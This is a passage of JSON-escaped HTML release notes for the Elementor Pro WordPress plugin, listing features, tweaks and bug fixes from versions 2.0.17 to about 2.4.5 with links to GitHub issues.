href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7083\\\">#7083<\\/a>)<\\/li>\\n<li>Fix: Show popup preview only on it's own preview<\\/li>\\n<li>Fix: Elementor dashboard templates URL corrupted links in edge cases<\\/li>\\n<\\/ul>\\n<h4>2.4.4 - 2019-02-11<\\/h4>\\n<ul>\\n<li>Tweak: Added ACF Date Time Picker field support (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6690\\\">#6690<\\/a>)<\\/li>\\n<li>Tweak: Changed the term of <code>All Posts<\\/code> condition to <code>Posts<\\/code><\\/li>\\n<li>Fix: Added <code><IfModule><\\/code> to avoid 500 error when <code>mod-headers<\\/code> is missing (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7034\\\">#7034<\\/a>)<\\/li>\\n<li>Fix: Include post CSS deletion in Global Widget update (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6856\\\">#6856<\\/a>)<\\/li>\\n<li>Fix: <code>Textarea<\\/code> default value in Forms Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6934\\\">#6934<\\/a>)<\\/li>\\n<li>Fix: MailPoet latest version caused fatal error (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6996\\\">#6996<\\/a>)<\\/li>\\n<li>Fix: Fatal Error caused by calling MailPoet deleted method<\\/li>\\n<li>Notice: MailPoet <code>Auto Confirm<\\/code> option will now default to "On"<\\/li>\\n<\\/ul>\\n<h4>2.4.3 - 2019-01-30<\\/h4>\\n<ul>\\n<li>Fix: Custom Add to Cart widget responsive alignment settings<\\/li>\\n<li>Fix: Links in Post Info widget<\\/li>\\n<li>Fix: WooCommerce <code>View Cart<\\/code> string translate<\\/li>\\n<li>Fix: Wrapper classes for header\\/footer templates (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6884\\\">#6884<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.4.2 - 2019-01-25<\\/h4>\\n<ul>\\n<li>Tweak: Added pixel units to Close Button position control in Popups<\\/li>\\n<li>Fix: Exclude error in WC Products widget<\\/li>\\n<\\/ul>\\n<h4>2.4.1 - 2019-01-24<\\/h4>\\n<ul>\\n<li>Tweak: Added CSS classes control to Popup (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6826\\\">#6826<\\/a>)<\\/li>\\n<li>Tweak: Added responsive image size to Testimonial Carousel widget<\\/li>\\n<li>Fix: PHP warning when Toolset Date dynamic is empty (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6842\\\">#6842<\\/a>)<\\/li>\\n<li>Fix: Support of exclude-ids in WC Products widget<\\/li>\\n<li>Fix: Popup close button not clickable<\\/li>\\n<li>Fix: Alignment justify issue of Add to Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6749\\\">#6749<\\/a>)<\\/li>\\n<li>Fix: Bad anchors breaks the page JS<\\/li>\\n<li>Fix: Popup overlay shown when turned off<\\/li>\\n<\\/ul>\\n<h4>2.4.0 - 2019-01-21<\\/h4>\\n<ul>\\n<li>New: Introducing Popup Builder (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/628\\\">#628<\\/a>)<\\/li>\\n<li>New: Added <code>Popup<\\/code> Dynamic Tag<\\/li>\\n<li>New: Added <code>Popup<\\/code> forms action after submit<\\/li>\\n<li>New: Added User Info dynamic tag (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6322\\\">#6322<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic capabilities for "Nothing Found" message<\\/li>\\n<li>Tweak: Added <code>elementor_pro\\/theme_builder\\/archive\\/escape_nothing_found_message<\\/code> Filter to avoid HTML escaping in "Nothing Found" message (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6053\\\">#6053<\\/a>)<\\/li>\\n<li>Tweak: Added <code>add_doc_to_location<\\/code> method to Allow insertion of a document to a location<\\/li>\\n<li>Fix: <code>z-index<\\/code> issue with CTA widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6486\\\">#6486<\\/a>)<\\/li>\\n<li>Fix: Hide the Post Content widget and show it only in a Single document<\\/li>\\n<li>Fix: <code>selector<\\/code> replacement in Custom CSS<\\/li>\\n<li>Fix: Apply <code>the_content<\\/code> on the real content only<\\/li>\\n<li>Fix: CSS for WC products selector (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6559\\\">#6559<\\/a>)<\\/li>\\n<li>Fix: Odnoklassniki share URL (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6638\\\">#6638<\\/a>)<\\/li>\\n<li>Fix: Custom link new tab in Post Info widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5766\\\">#5766<\\/a>)<\\/li>\\n<li>Fix: <code>nofollow<\\/code> link in Flip Box & CTA widgets<\\/li>\\n<li>Fix: Post Terms in Post Info widget<\\/li>\\n<li>Fix: Added screen reader to some icons & buttons for better accessibility (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5386\\\">#5386<\\/a>)<\\/li>\\n<li>Fix: Accessibility labels in Reviews widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6630\\\">#6630<\\/a>)<\\/li>\\n<li>Fix: Link to cart page not working when WooCommerce Subscriptions is active<\\/li>\\n<li>Fix: MailChimp Selected list not showing on reloading in Form widget<\\/li>\\n<li>Fix: Sub-menu arrow position in Nav Menu widget<\\/li>\\n<li>Fix: Conflict with WP Security Audit Log plugin (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6648\\\">#6648<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.3.1 - 2018-12-19<\\/h4>\\n<ul>\\n<li>Fix: Template widget search functionality (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6473\\\">#6473<\\/a>)<\\/li>\\n<li>Fix: Apply <code>the_content<\\/code> filter to post content in theme builder<\\/li>\\n<\\/ul>\\n<h4>2.3.0 - 2018-12-17<\\/h4>\\n<ul>\\n<li>New: Introducing Discord Integration for Forms (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4218\\\">#4218<\\/a>)<\\/li>\\n<li>New: Introducing Slack Integration for Forms<\\/li>\\n<li>New: Introducing MailerLite Integration for Forms (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4462\\\">#4462<\\/a>)<\\/li>\\n<li>New: Activate Elementor Pro plugin by connecting to Elementor account<\\/li>\\n<li>Tweak: Added <code>elementor_pro\\/utils\\/get_public_post_types<\\/code> filter hook (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5900\\\">#5900<\\/a>)<\\/li>\\n<li>Tweak: Added <code>loop_start<\\/code> & <code>the_content<\\/code> hooks for Post Content (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6173\\\">#6173<\\/a>)<\\/li>\\n<li>Tweak: Removed Custom Attributes from Page Settings<\\/li>\\n<li>Tweak: Always add the Custom CSS control to the Advanced tab<\\/li>\\n<li>Fix: In sub Term condition false positive in edge cases<\\/li>\\n<li>Fix: ToolSet Dynamic Image fallback<\\/li>\\n<li>Fix: Style glitch with the dropdown color in Nav Menu widget<\\/li>\\n<li>Fix: Style glitch in the Conditions screen in Safari browser<\\/li>\\n<li>Fix: Ribbon in the CTA widget obscures drop down menu (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6080\\\">#6080<\\/a>)<\\/li>\\n<li>Fix: The color of label won't change color in Widget login<\\/li>\\n<\\/ul>\\n<h4>2.2.5 - 2018-12-11<\\/h4>\\n<ul>\\n<li>New: Add Style Tab & Custom CSS for Header & Footer Templates.<\\/li>\\n<li>Tweak: Added a better identifier for subpages (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6362\\\">#6362<\\/a>)<\\/li>\\n<li>Tweak: Removed Custom Attributes from page settings<\\/li>\\n<li>Fix: Yahoo event URL date issue (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6354\\\">#6354<\\/a>)<\\/li>\\n<li>Fix: Allow timezone settings in Google event URL (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6354\\\">#6354<\\/a>)<\\/li>\\n<li>Fix: Avoid <code>z-index<\\/code> changes by <code>nanocss<\\/code> in build process<\\/li>\\n<li>Fix: Added missing WC upsells products CSS<\\/li>\\n<li>Fix: Nav Menu dropdown losing color on hover<\\/li>\\n<li>Fix: WC Product Add-ons CSS compatibility<\\/li>\\n<\\/ul>\\n<h4>2.2.4 - 2018-12-04<\\/h4>\\n<ul>\\n<li>Fix: Global widget not saving changes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6340\\\">#6340<\\/a>)<\\/li>\\n<li>Fix: Dynamic tags support in Blockquote widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6334\\\">#6334<\\/a>)<\\/li>\\n<li>Fix: Forms Redirect URL action when using form field values with spaces<\\/li>\\n<\\/ul>\\n<h4>2.2.3 - 2018-11-29<\\/h4>\\n<ul>\\n<li>Fix: Missing "Edit Template" in Template widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6271\\\">#6271<\\/a>)<\\/li>\\n<li>Fix: Follow menu anchors with UTF8 characters in Nav Menu<\\/li>\\n<li>Fix: Show only supported templates in Template widget<\\/li>\\n<li>Fix: Revert conflicting fix for a default order for WC archive<\\/li>\\n<\\/ul>\\n<h4>2.2.2 - 2018-11-28<\\/h4>\\n<ul>\\n<li>Fix: Lightbox dynamic tag crashes the editor<\\/li>\\n<\\/ul>\\n<h4>2.2.1 - 2018-11-28<\\/h4>\\n<ul>\\n<li>New: Added <code>ACF File<\\/code> Dynamic tag to support text controls.<\\/li>\\n<li>Tweak: Added option to hide item count bubble when cart is empty in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6223\\\">#6223<\\/a>)<\\/li>\\n<li>Tweak: Added Actions group for Lightbox and Contact URL tags<\\/li>\\n<li>Tweak: Added filter <code>elementor_pro\\/dynamic_tags\\/shortcode\\/should_escape<\\/code> to avoid escaping in Shortcode dynamic tag<\\/li>\\n<li>Tweak: MailPoet3 integration allow Subscriber to to subscribe to multiple lists<\\/li>\\n<li>Tweak: Added front-end max file size validation for upload fields<\\/li>\\n<li>Tweak: Added <code>by-author<\\/code> per Post-Type condition for theme builder<\\/li>\\n<li>Fix: Template widget panel not showing the selected template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6271\\\">#6271<\\/a>)<\\/li>\\n<li>Fix: Conflict between ACF with Safari browser on Select option in Dynamic tag<\\/li>\\n<li>Fix: Add post classes only for the Single template<\\/li>\\n<li>Fix: Set document type as not editable for unsupported document like Global widget<\\/li>\\n<li>Fix: Avoid duplicate query for current WC product query<\\/li>\\n<li>Fix: Product Archive showing oldest products instead of latest<\\/li>\\n<li>Fix: CSS reset in Posts widget using cards skin<\\/li>\\n<\\/ul>\\n<h4>2.2.0 - 2018-11-19<\\/h4>\\n<ul>\\n<li>New: Introducing Custom Attributes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/290\\\">#290<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3990\\\">#3990<\\/a>)<\\/li>\\n<li>New: Added evergreen option for Countdown widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4459\\\">#4459<\\/a>)<\\/li>\\n<li>New: Added expire actions option for Countdown widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5242\\\">#5242<\\/a>)<\\/li>\\n<li>New: Introducing Reviews widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3854\\\">#3854<\\/a>)<\\/li>\\n<li>New: Introducing Sitemap widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5594\\\">#5594<\\/a>)<\\/li>\\n<li>New: Added Request Parameter dynamic tag (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4934\\\">#4934<\\/a>)<\\/li>\\n<li>New: Added Shortcode dynamic tag<\\/li>\\n<li>New: Added Image and Video Lightbox dynamic tag<\\/li>\\n<li>New: Added Contact URL dynamic tag<\\/li>\\n<li>New: Added Featured Image Data dynamic tag<\\/li>\\n<li>New: Added default value to each field in the Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4268\\\">#4268<\\/a>)<\\/li>\\n<li>New: Added "Any Child Of" condition to template conditions (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5321\\\">#5321<\\/a>)<\\/li>\\n<li>New: Added "In Child" condition to template conditions (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5587\\\">#5587<\\/a>)<\\/li>\\n<li>Tweak: Added Form Redirect URL with form values (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2564\\\">#2564<\\/a>)<\\/li>\\n<li>Tweak: Added default post classes to template wrapper (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5959\\\">#5959<\\/a>)<\\/li>\\n<li>Tweak: Better labels for terms in Query control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6092\\\">#6092<\\/a>)<\\/li>\\n<li>Tweak: Renamed "Child Of" templates condition to "Direct Child Of"<\\/li>\\n<li>Tweak: Added <code>elementor\\/theme\\/get_location_templates\\/condition_sub_id<\\/code> filter hook to allow template condition translations<\\/li>\\n<li>Tweak: Load the Template Library widget via Ajax for better performance<\\/li>\\n<li>Tweak: Added 404 page title for Page Title dynamic tag<\\/li>\\n<li>Fix: Menu Cart Toggle has # URL link (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6141\\\">#6141<\\/a>)<\\/li>\\n<li>Fix: Alignment issue in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5790\\\">#5790<\\/a>)<\\/li>\\n<li>Fix: Avoid potential security risk in forms<\\/li>\\n<li>Fix: Template By Author condition conflicts with 404 page<\\/li>\\n<li>Fix: Restored WC Product Content widget in Single Product template<\\/li>\\n<li>Fix: Theme Builder Preview URLs for date archives and 404 pages<\\/li>\\n<li>Fix: Highlight active menu anchor items only when scrolled into view<\\/li>\\n<li>Fix: Carousel Pagination Progress style to support new Swiper version<\\/li>\\n<\\/ul>\\n<h4>2.1.13 - 2018-11-12<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for new brand Finder in v2.3.0<\\/li>\\n<li>Fix: Settings conflict when there are multiple carousels in the page<\\/li>\\n<\\/ul>\\n<h4>2.1.12 - 2018-11-05<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for the upcoming release of Elementor v2.3<\\/li>\\n<li>Tweak: Better performance for Template Library widget<\\/li>\\n<li>Fix: Fatal error if a taxonomy used in a dynamic field is removed (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6029\\\">#6029<\\/a>)<\\/li>\\n<li>Fix: Date Time dynamic tag now respect site language (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6001\\\">#6001<\\/a>)<\\/li>\\n<li>Fix: Custom CSS printed twice in the front-end<\\/li>\\n<li>Fix: ACF Image field PHP warning (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6051\\\">#6051<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.1.11 - 2018-10-22<\\/h4>\\n<ul>\\n<li>New: Added ACF local fields compatibility<\\/li>\\n<li>Tweak: Re-brand TypeKit by Adobe Fonts integration<\\/li>\\n<li>Fix: Exclude <code>is_embed<\\/code> from Singular condition (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5915\\\">#5915<\\/a>)<\\/li>\\n<li>Fix: Avoid conflict with Ad Blockers and Share Buttons<\\/li>\\n<li>Fix: Current date time dynamic tag now shows local time<\\/li>\\n<li>Fix: Avoid conflict with 3rd party plugins that filter the permalink<\\/li>\\n<li>Fix: Avoid PHP warning when no groups are selected for MailChimp integration<\\/li>\\n<li>Fix: Avoid PHP warning if checkbox field is empty for ACF<\\/li>\\n<li>Fix: Respect password protected for a WC single product template<\\/li>\\n<li>Fix: Respect <code>order<\\/code> settings for WC archive also without pagination<\\/li>\\n<\\/ul>\\n<h4>2.1.10 - 2018-10-09<\\/h4>\\n<ul>\\n<li>Tweak: Added responsive alignment control for Share Buttons widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5821\\\">#5821<\\/a>)<\\/li>\\n<li>Tweak: Added link control to Animated Headline widget<\\/li>\\n<li>Fix: Mobile nav menu jump on RTL (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5711\\\">#5711<\\/a>)<\\/li>\\n<li>Fix: Responsive alignment control in Add to Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5830\\\">#5830<\\/a>)<\\/li>\\n<li>Fix: Added IE compatibility for Animated Headline widget<\\/li>\\n<li>Fix: Post Content widget is now shown only on <code>Single<\\/code> templates<\\/li>\\n<li>Fix: Query Control Pagination with offset<\\/li>\\n<\\/ul>\\n<h4>2.1.9 - 2018-09-17<\\/h4>\\n<ul>\\n<li>Tweak: Added Centered Slides option for Slideshow carousel<\\/li>\\n<li>Fix: Allow only public CPT for Manual Selection in Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5091\\\">#5091<\\/a>)<\\/li>\\n<li>Fix: ACF Gallery option support (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5344\\\">#5344<\\/a>)<\\/li>\\n<li>Fix: Page scrolling on resize when sticky is active (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5740\\\">#5740<\\/a>)<\\/li>\\n<li>Fix: Edit custom name for Global Widget in the Navigator (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5689\\\">#5689<\\/a>)<\\/li>\\n<li>Fix: Coverflow transition effect in Carousel<\\/li>\\n<li>Fix: Weird mobile behavior with Cube effect in Carousel<\\/li>\\n<li>Fix: Show the first thumbnail in the Slideshow carousel correctly<\\/li>\\n<\\/ul>\\n<h4>2.1.8 - 2018-09-12<\\/h4>\\n<ul>\\n<li>Tweak: Added styling options for WC Additional Information widget<\\/li>\\n<li>Tweak: Added styling options for 'View Cart' link in Products widget<\\/li>\\n<li>Fix: 3rd party plugin support for WC single product template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5338\\\">#5338<\\/a>)<\\/li>\\n<li>Fix: Layout of Related Product widget with WC native style<\\/li>\\n<\\/ul>\\n<h4>2.1.7 - 2018-09-03<\\/h4>\\n<ul>\\n<li>New: WC Archive Description widget<\\/li>\\n<li>Tweak: Added blend mode to Slides widget background overlay (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5555\\\">#5555<\\/a>)<\\/li>\\n<li>Tweak: Added 'Current Subcategories' option to Product Categories widget<\\/li>\\n<li>Fix: Added default vertical alignment in Author Box widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5589\\\">#5589<\\/a>)<\\/li>\\n<li>Tweak: Added more blend mode options for CTA widget<\\/li>\\n<li>Tweak: Improved plugin updater method based on WordPress version<\\/li>\\n<li>Fix: Improved IE compatibility for Posts and Portfolio widgets<\\/li>\\n<li>Fix: Added default gap for products pagination<\\/li>\\n<li>Fix: Post thumbnail flickering in Safari browser<\\/li>\\n<li>Fix: Close mobile nav menu on click only in full-width mode<\\/li>\\n<li>Fix: Added trailing slash to pagination links in Posts widget<\\/li>\\n<\\/ul>\\n<h4>2.1.6 - 2018-08-28<\\/h4>\\n<ul>\\n<li>New: WC Product Category Image widget and Dynamic tag (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5117\\\">#5117<\\/a>)<\\/li>\\n<li>Tweak: Allow HTML in Excerpt widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5491\\\">#5491<\\/a>)<\\/li>\\n<li>Tweak: Added compatibility for the upcoming release of Elementor v2.2<\\/li>\\n<li>Tweak: Deprecated Follow option in the Facebook Button widget<\\/li>\\n<li>Fix: Posts widget grid in Safari & IE11 (Depended on Elementor v2.2)<\\/li>\\n<li>Fix: Posts widget CSS when using cards skin in masonry mode<\\/li>\\n<li>Fix: ACF Image & ACF URL option support (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5344\\\">#5344<\\/a>)<\\/li>\\n<li>Fix: WC product gallery links in RTL<\\/li>\\n<li>Fix: Dynamic tags in Call To Action widget<\\/li>\\n<\\/ul>\\n<h4>2.1.5 - 2018-08-21<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for the upcoming release of Elementor v2.2<\\/li>\\n<li>Fix: Posts Widget layout theme compatibility<\\/li>\\n<li>Fix: Added compatibility for WooCommerce native style<\\/li>\\n<\\/ul>\\n<h4>2.1.4 - 2018-08-19<\\/h4>\\n<ul>\\n<li>Fix: Layout issue compatibility with themes caused by v2.1 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5442\\\">#5442<\\/a>)<\\/li>\\n<li>Fix: Dynamic setting in Pricing Table widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5460\\\">#5460<\\/a>)<\\/li>\\n<li>Fix: Hide Target URL control if is not necessary in Blockquote widget<\\/li>\\n<li>Fix: Selector specificity for WooCommerce Products widget<\\/li>\\n<li>Fix: WooCommerce conflicts in the editor in edge cases<\\/li>\\n<\\/ul>\\n<h4>2.1.3 - 2018-08-15<\\/h4>\\n<ul>\\n<li>Fix: Thumbnails in the Posts widget jumping (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5350\\\">#5350<\\/a>)<\\/li>\\n<li>Fix: Responsive grid in the Share Buttons widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5375\\\">#5375<\\/a>)<\\/li>\\n<li>Fix: Added missing <code>setup_postdata<\\/code> for Product Data Tabs widget<\\/li>\\n<li>Fix: Rollback to older version of Flip Box widget to resolve 3D depth issue (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5399\\\">#5399<\\/a>)<\\/li>\\n<li>Fix: Allowed types in the Upload File field are now case-insensitive (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5254\\\">#5254<\\/a>)<\\/li>\\n<li>Fix: Carousel behavior when using a single slide<\\/li>\\n<\\/ul>\\n<h4>2.1.2 - 2018-08-12<\\/h4>\\n<ul>\\n<li>Fix: Error when ACF Pro is not installed (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5367\\\">#5367<\\/a>)<\\/li>\\n<li>Fix: Edge cases in Inspector where document is a boolean<\\/li>\\n<li>Fix: Edge cases for incorrect file fields in PODS<\\/li>\\n<\\/ul>\\n<h4>2.1.1 - 2018-08-09<\\/h4>\\n<ul>\\n<li>Fix: Highlighted text in Animated Headline widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5345\\\">#5345<\\/a>)<\\/li>\\n<li>Fix: Flip Box effect issues<\\/li>\\n<li>Fix: ACF Options page fields support (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5329\\\">#5329<\\/a>)<\\/li>\\n<li>Fix: Import Pro templates in edge cases<\\/li>\\n<\\/ul>\\n<h4>2.1.0 - 2018-08-07<\\/h4>\\n<ul>\\n<li>New: Introducing WooCommerce Builder (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1690\\\">#1690<\\/a>)<\\/li>\\n<li>New: Introducing 12 new dynamic tags & widgets for WooCommerce: Gallery, Image, Price, Rating, Description, Breadcrumbs, Data Tabs, Stock, Related, Upsell, Title & Archive<\\/li>\\n<li>New: Introducing Cart Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4220\\\">#4220<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4600\\\">#4600<\\/a>)<\\/li>\\n<li>New: Added integration with Toolset (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2949\\\">#2949<\\/a>)<\\/li>\\n<li>New: Added integration with Pods (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4129\\\">#4129<\\/a>)<\\/li>\\n<li>New: Added stick to bottom in scrolling effects (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4799\\\">#4799<\\/a>)<\\/li>\\n<li>New: Added Scrolling Effect to Widgets under advanced tab<\\/li>\\n<li>New: Introducing Internal URL Dynamic Tag<\\/li>\\n<li>Tweak: Added a Last Updated Date in the Post Info widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4597\\\">#4597<\\/a>)<\\/li>\\n<li>Tweak: Added Redirect after Logout option for Login widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4447\\\">#4447<\\/a>)<\\/li>\\n<li>Tweak: Avoid repeating posts when using more than one in the Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1878\\\">#1878<\\/a>)<\\/li>\\n<li>Tweak: Add Custom Query hook for Query control (<a href=\\\"https:\\/\\/developers.elementor.com\\/custom-query-filter\\/\\\">More Info<\\/a>) (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1748\\\">#1748<\\/a>)<\\/li>\\n<li>Tweak: Added form-message style (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1180\\\">#1180<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic tag for button on the Price Table widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4242\\\">#4242<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic tag for Call to action widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4767\\\">#4767<\\/a>)<\\/li>\\n<li>Tweak: Added Dynamic Tags support for Google Map field (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4602\\\">#4602<\\/a>)<\\/li>\\n<li>Tweak: Added an support for <code>label|value<\\/code> in options field (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4594\\\">#4594<\\/a>)<\\/li>\\n<li>Tweak: Added <code>by-author<\\/code> condition for theme builder (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4681\\\">#4681<\\/a>)<\\/li>\\n<li>Tweak: Added Activate\\/Deactivate license key via WP-CLI command (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4149\\\">#4149<\\/a>)<\\/li>\\n<li>Tweak: Added <code>is_scroll<\\/code> trigger to scrolling effect (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4340\\\">#4340<\\/a>)<\\/li>\\n<li>Tweak: Added In Same Term support for Post Navigation widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4177\\\">#4177<\\/a>)<\\/li>\\n<li>Tweak: Added responsive control for Slides To Scroll control in all carousel widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3697\\\">#3697<\\/a>)<\\/li>\\n<li>Tweak: Added style options for Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1335\\\">#1335<\\/a>)<\\/li>\\n<li>Tweak: Added button CSS ID for Forms widget<\\/li>\\n<li>Tweak: Added pixel units to Post-Info divider height control<\\/li>\\n<li>Tweak: Rewrite sticky library to handle with stretch section, auto scroller & more bugs<\\/li>\\n<li>Tweak: Re-organize the panel categories per document type<\\/li>\\n<li>Tweak: Added ACF support for <code>options-page<\\/code> fields<\\/li>\\n<li>Tweak: Added dynamic tag for Animated headlines<\\/li>\\n<li>Tweak: Added dynamic tag for BlockQuote widget<\\/li>\\n<li>Fix: Elementor Full Width template in GeneratePress theme (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4817\\\">#4817<\\/a>)<\\/li>\\n<li>Fix: Checkbox fields can accidentally be set to required (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4324\\\">#4324<\\/a>)<\\/li>\\n<li>Fix: Initial slide in Carousel widget<\\/li>\\n<li>Fix: Stay on current slide while editing in Carousel widget<\\/li>\\n<li>Fix: Default slides per device in Carousel widget<\\/li>\\n<li>Deprecated: Woo Products, Woo Elements & Single elements widgets<\\/li>\\n<\\/ul>\\n<h4>2.0.18 - 2018-07-27<\\/h4>\\n<ul>\\n<li>Fix: Global widget error on saving page<\\/li>\\n<\\/ul>\\n<h4>2.0.17 - 2018-07-26<\\/h4>\\n<ul>\\n<li>Fix: Sub menu indicator direction in Nav Menu widget<\\/li>\\n<li>Fix: Change the title and icon for Global Widget when is moving<\\/li>\\n<li>Fix: CSS wrapper selector for Page 